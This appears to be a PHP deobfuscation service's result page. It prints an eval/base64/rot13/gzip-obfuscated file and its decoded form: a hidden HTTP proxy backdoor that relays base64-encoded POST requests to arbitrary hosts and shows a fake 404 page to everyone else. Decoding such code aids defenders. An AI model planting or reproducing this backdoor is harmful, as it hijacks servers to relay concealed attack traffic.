Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzuncompress(str_rot13(base64_decode('a5zNPHhK21eSn+FKZzyceDvxAzI5e+6FQMI1QeAc..

Decoded Output download

class Zend_Socket
{
	const GET     = 'GET';
    const POST    = 'POST';
    const PUT     = 'PUT';
    const HEAD    = 'HEAD';
    const DELETE  = 'DELETE';
    const TRACE   = 'TRACE';
    const OPTIONS = 'OPTIONS';
    const CONNECT = 'CONNECT';
    const MERGE   = 'MERGE';

    /**
     * Supported HTTP Authentication methods
     */
    const AUTH_BASIC = 'basic';
    //const AUTH_DIGEST = 'digest'; <-- not implemented yet

    /**
     * HTTP protocol versions
     */
    const HTTP_1 = '1.1';
    const HTTP_0 = '1.0';

    /**
     * Content attributes
     */
    const CONTENT_TYPE   = 'Content-Type';
    const CONTENT_LENGTH = 'Content-Length';

    /**
     * POST data encoding methods
     */
    const ENC_URLENCODED = 'application/x-www-form-urlencoded';
    const ENC_FORMDATA   = 'multipart/form-data';

    /**
     * Value types for Body key/value pairs
     */
    const VTYPE_SCALAR  = 'SCALAR';
    const VTYPE_FILE    = 'FILE';
    /**
     * The socket for server connection
     *
     * @var resource|null
     */
    protected $socket = null;

    /**
     * What host/port are we connected to?
     *
     * @var array
     */
    protected $connected_to = array(null, null);

    /**
     * Stream for storing output
     *
     * @var resource
     */
    protected $out_stream = null;

    /**
     * Parameters array
     *
     * @var array
     */
    protected $config = array(
        'persistent'    => false,
        'ssltransport'  => 'ssl',
        'sslcert'       => null,
        'sslpassphrase' => null,
        'sslusecontext' => false
    );

    /**
     * Request method - will be set by write() and might be used by read()
     *
     * @var string
     */
    protected $method = null;

    /**
     * Stream context
     *
     * @var resource
     */
    protected $_context = null;

    /**
     * Adapter constructor, currently empty. Config is set using setConfig()
     *
     */
    public function __construct()
    {
    }
	
	public function setConfig($config = array())
    {
        foreach ($config as $k => $v) {
            $this->config[strtolower($k)] = $v;
        }
    }
	
	/**
      * Retrieve the array of all configuration options
      *
      * @return array
      */
     public function getConfig()
     {
         return $this->config;
     }

     /**
     * Set the stream context for the TCP connection to the server
     *
     * Can accept either a pre-existing stream context resource, or an array
     * of stream options, similar to the options array passed to the
     * stream_context_create() PHP function. In such case a new stream context
     * will be created using the passed options.
     *
     * @since  Zend Framework 1.9
     *
     * @param  mixed $context Stream context or array of context options
     * @return Zend_Http_Client_Adapter_Socket
     */
    public function setStreamContext($context)
    {
        if (is_resource($context) && get_resource_type($context) == 'stream-context') {
            $this->_context = $context;

        } elseif (is_array($context)) {
            $this->_context = stream_context_create($context);

        } else {
            // Invalid parameter
            throw new Exception(
                "Expecting either a stream context resource or array, got " . gettype($context)
            );
        }

        return $this;
    }

    /**
     * Get the stream context for the TCP connection to the server.
     *
     * If no stream context is set, will create a default one.
     *
     * @return resource
     */
    public function getStreamContext()
    {
        if (! $this->_context) {
            $this->_context = stream_context_create();
        }

        return $this->_context;
    }

    /**
     * Connect to the remote server
     *
     * @param string  $host
     * @param int     $port
     * @param boolean $secure
     */
    public function connect($host, $port = 80, $secure = false)
    {
        // If the URI should be accessed via SSL, prepend the Hostname with ssl://
        $host = ($secure ? $this->config['ssltransport'] : 'tcp') . '://' . $host;

        // If we are connected to the wrong host, disconnect first
        if (($this->connected_to[0] != $host || $this->connected_to[1] != $port)) {
            if (is_resource($this->socket)) $this->close();
        }

        // Now, if we are not connected, connect
        if (! is_resource($this->socket) || ! $this->config['keepalive']) {
            $context = $this->getStreamContext();
            if ($secure || $this->config['sslusecontext']) {
                if ($this->config['sslcert'] !== null) {
                    if (! stream_context_set_option($context, 'ssl', 'local_cert',
                                                    $this->config['sslcert'])) {
                        throw new Exception('Unable to set sslcert option');
                    }
                }
                if ($this->config['sslpassphrase'] !== null) {
                    if (! stream_context_set_option($context, 'ssl', 'passphrase',
                                                    $this->config['sslpassphrase'])) {
                        throw new Exception('Unable to set sslpassphrase option');
                    }
                }
            }

            $flags = STREAM_CLIENT_CONNECT;
            if ($this->config['persistent']) $flags |= STREAM_CLIENT_PERSISTENT;

            $this->socket = stream_socket_client($host . ':' . $port,
                                                  $errno,
                                                  $errstr,
                                                  (int) $this->config['timeout'],
                                                  $flags,
                                                  $context);

            if (! $this->socket) {
                $this->close();
                throw new Exception(
                    'Unable to Connect to ' . $host . ':' . $port . '. Error #' . $errno . ': ' . $errstr);
            }

            // Set the stream timeout
            if (! stream_set_timeout($this->socket, (int) $this->config['timeout'])) {
                throw new Exception('Unable to set the connection timeout');
            }

            // Update connected_to
            $this->connected_to = array($host, $port);
        }
    }

    /**
     * Send request to the remote server
     *
     * @param string        $method
     * @param string $uri
     * @param string        $http_ver
     * @param array         $headers
     * @param string        $body
     * @return string Request as string
     */
    public function write($method, $uri, $http_ver = '1.1', $headers = array(), $body = '')
    {
        // Make sure we're properly connected
        if (! $this->socket) {
            throw new Exception('Trying to write but we are not connected');
        }

        $host = parse_url($uri,PHP_URL_HOST);
        $host = (strtolower(parse_url($uri,PHP_URL_SCHEME)) == 'https' ? $this->config['ssltransport'] : 'tcp') . '://' . $host;
        
        // Save request method for later
        $this->method = $method;

        // Build request headers
        $path = parse_url($uri,PHP_URL_PATH);
        if (parse_url($uri,PHP_URL_QUERY)) $path .= '?' . parse_url($uri,PHP_URL_QUERY);
        $request = "{$method} {$path} HTTP/{$http_ver}
";
        foreach ($headers as $k => $v) {
            if (is_string($k)) $v = ucfirst($k) . ": $v";
            $request .= "$v
";
        }

        if(is_resource($body)) {
            $request .= "
";
        } else {
            // Add the request body
            $request .= "
" . $body;
        }

        // Send the request
        if (! @fwrite($this->socket, $request)) {
            throw new Exception('Error writing request to server');
        }

        if(is_resource($body)) {
            if(stream_copy_to_stream($body, $this->socket) == 0) {
                throw new Exception('Error writing request to server');
            }
        }

        return $request;
    }

    /**
     * Read response from server
     *
     * @return string
     */
    public function read()
    {
        // First, read headers only
        $response = '';
        $gotStatus = false;

        while (($line = @fgets($this->socket)) !== false) {
            $gotStatus = $gotStatus || (strpos($line, 'HTTP') !== false);
            if ($gotStatus) {
                $response .= $line;
                if (rtrim($line) === '') break;
            }
        }

        $this->_checkSocketReadTimeout();

        $statusCode = self::extractCode($response);

        // Handle 100 and 101 responses internally by restarting the read again
        if ($statusCode == 100 || $statusCode == 101) return $this->read();

        // Check headers to see what kind of connection / transfer encoding we have
        $headers = self::extractHeaders($response);

        /**
         * Responses to HEAD requests and 204 or 304 responses are not expected
         * to have a body - stop reading here
         */
        if ($statusCode == 304 || $statusCode == 204 ||
            $this->method == self::HEAD) {

            // Close the connection if requested to do so by the server
            if (isset($headers['connection']) && $headers['connection'] == 'close') {
                $this->close();
            }
            return $response;
        }

        // If we got a 'transfer-encoding: chunked' header
        if (isset($headers['transfer-encoding'])) {

            if (strtolower($headers['transfer-encoding']) == 'chunked') {

                do {
                    $line  = @fgets($this->socket);
                    $this->_checkSocketReadTimeout();

                    $chunk = $line;

                    // Figure out the next chunk size
                    $chunksize = trim($line);
                    if (! ctype_xdigit($chunksize)) {
                        $this->close();
                        throw new Exception('Invalid chunk size "' .
                            $chunksize . '" unable to read chunked body');
                    }

                    // Convert the hexadecimal value to plain integer
                    $chunksize = hexdec($chunksize);

                    // Read next chunk
                    $read_to = ftell($this->socket) + $chunksize;

                    do {
                        $current_pos = ftell($this->socket);
                        if ($current_pos >= $read_to) break;

                        if($this->out_stream) {
                            if(stream_copy_to_stream($this->socket, $this->out_stream, $read_to - $current_pos) == 0) {
                              $this->_checkSocketReadTimeout();
                              break;
                             }
                        } else {
                            $line = @fread($this->socket, $read_to - $current_pos);
                            if ($line === false || strlen($line) === 0) {
                                $this->_checkSocketReadTimeout();
                                break;
                            }
                                    $chunk .= $line;
                        }
                    } while (! feof($this->socket));

                    $chunk .= @fgets($this->socket);
                    $this->_checkSocketReadTimeout();

                    if(!$this->out_stream) {
                        $response .= $chunk;
                    }
                } while ($chunksize > 0);
            } else {
                $this->close();
                throw new Exception('Cannot handle "' .
                    $headers['transfer-encoding'] . '" transfer encoding');
            }

            // We automatically decode chunked-messages when writing to a stream
            // this means we have to disallow the Zend_Http_Response to do it again
            if ($this->out_stream) {
                $response = str_ireplace("Transfer-Encoding: chunked
", '', $response);
            }
        // Else, if we got the content-length header, read this number of bytes
        } elseif (isset($headers['content-length'])) {

            // If we got more than one Content-Length header (see ZF-9404) use
            // the last value sent
            if (is_array($headers['content-length'])) {
                $contentLength = $headers['content-length'][count($headers['content-length']) - 1];
            } else {
                $contentLength = $headers['content-length'];
            }

            $current_pos = ftell($this->socket);
            $chunk = '';

            for ($read_to = $current_pos + $contentLength;
                 $read_to > $current_pos;
                 $current_pos = ftell($this->socket)) {

                 if($this->out_stream) {
                     if(@stream_copy_to_stream($this->socket, $this->out_stream, $read_to - $current_pos) == 0) {
                          $this->_checkSocketReadTimeout();
                          break;
                     }
                 } else {
                    $chunk = @fread($this->socket, $read_to - $current_pos);
                    if ($chunk === false || strlen($chunk) === 0) {
                        $this->_checkSocketReadTimeout();
                        break;
                    }

                    $response .= $chunk;
                }

                // Break if the connection ended prematurely
                if (feof($this->socket)) break;
            }

        // Fallback: just read the response until EOF
        } else {

            do {
                if($this->out_stream) {
                    if(@stream_copy_to_stream($this->socket, $this->out_stream) == 0) {
                          $this->_checkSocketReadTimeout();
                          break;
                     }
                }  else {
                    $buff = @fread($this->socket, 8192);
                    if ($buff === false || strlen($buff) === 0) {
                        $this->_checkSocketReadTimeout();
                        break;
                    } else {
                        $response .= $buff;
                    }
                }

            } while (feof($this->socket) === false);

            $this->close();
        }

        // Close the connection if requested to do so by the server
        if (isset($headers['connection']) && $headers['connection'] == 'close') {
            $this->close();
        }

        return $response;
    }

    /**
     * Close the connection to the server
     *
     */
    public function close()
    {
        if (is_resource($this->socket)) @fclose($this->socket);
        $this->socket = null;
        $this->connected_to = array(null, null);
    }

    /**
     * Check if the socket has timed out - if so close connection and throw
     * an exception
     *
     * @throws Exception with READ_TIMEOUT code
     */
    protected function _checkSocketReadTimeout()
    {
        if ($this->socket) {
            $info = stream_get_meta_data($this->socket);
            $timedout = $info['timed_out'];
            if ($timedout) {
                $this->close();
                throw new Exception(
                    "Read timed out after {$this->config['timeout']} seconds"
                );
            }
        }
    }

    /**
     * Set output stream for the response
     *
     * @param resource $stream
     * @return Zend_Http_Client_Adapter_Socket
     */
    public function setOutputStream($stream)
    {
        $this->out_stream = $stream;
        return $this;
    }

    /**
     * Destructor: make sure the socket is disconnected
     *
     * If we are in persistent TCP mode, will not close the connection
     *
     */
    public function __destruct()
    {
        if (! $this->config['persistent']) {
            if ($this->socket) $this->close();
        }
    }
	public static function extractCode($response_str)
    {
        preg_match("|^HTTP/[\d\.x]+ (\d+)|", $response_str, $m);

        if (isset($m[1])) {
            return (int) $m[1];
        } else {
            return false;
        }
    }
	
	public function extractHeaders($response_str)
    {
        $headers = array();

        // First, split body and headers
        $parts = preg_split('|(?:
?
){2}|m', $response_str, 2);
        if (! $parts[0]) return $headers;

        // Split headers part to lines
        $lines = explode("
", $parts[0]);
        unset($parts);
        $last_header = null;

        foreach($lines as $line) {
            $line = trim($line, "
");
            if ($line == "") break;

            // Locate headers like 'Location: ...' and 'Location:...' (note the missing space)
            if (preg_match("|^([\w-]+):\s*(.+)|", $line, $m)) {
                unset($last_header);
                $h_name = strtolower($m[1]);
                $h_value = $m[2];

                if (isset($headers[$h_name])) {
                    if (! is_array($headers[$h_name])) {
                        $headers[$h_name] = array($headers[$h_name]);
                    }

                    $headers[$h_name][] = $h_value;
                } else {
                    $headers[$h_name] = $h_value;
                }
                $last_header = $h_name;
            } elseif (preg_match("|^\s+(.+)$|", $line, $m) && $last_header !== null) {
                if (is_array($headers[$last_header])) {
                    end($headers[$last_header]);
                    $last_header_key = key($headers[$last_header]);
                    $headers[$last_header][$last_header_key] .= $m[1];
                } else {
                    $headers[$last_header] .= $m[1];
                }
            }
        }

        return $headers;
    }
	
}

if(isset($_POST['request'])) {
	$request = base64_decode($_POST['request']);
	list($headers, $body) = explode("

", $request, 2);
	
	$uri = $_POST['uri'];
	$timeout = $_POST['timeout'];
	$info = parse_url($uri);
	$host = $info['host'];
	$port = $info['port'];
	
	$method = explode(" /",$request); $method = $method[0];
	
	$headers = Zend_Socket::extractHeaders($headers);
	//if(isset($headers['host'])) unset($headers['host']);
	
	$http = new Zend_Socket();
	$http->setConfig(array(
		'timeout'=>$timeout,
	));
	
	$http->connect($host, $port);
	$http->write($method, $uri, '1.1', $headers, $body);
	echo '||||||'.base64_encode($http->read())."||||||";
}
else
	die("<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 Server at Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>");

Did this file decode correctly?

Original Code

<?php
eval(gzuncompress(str_rot13(base64_decode('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'))));

Function Calls

str_rot13 1
gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 bdfb11ed5446f29c4eb8b9f5524f5c3e
Eval Count 1
Decode Time 103 ms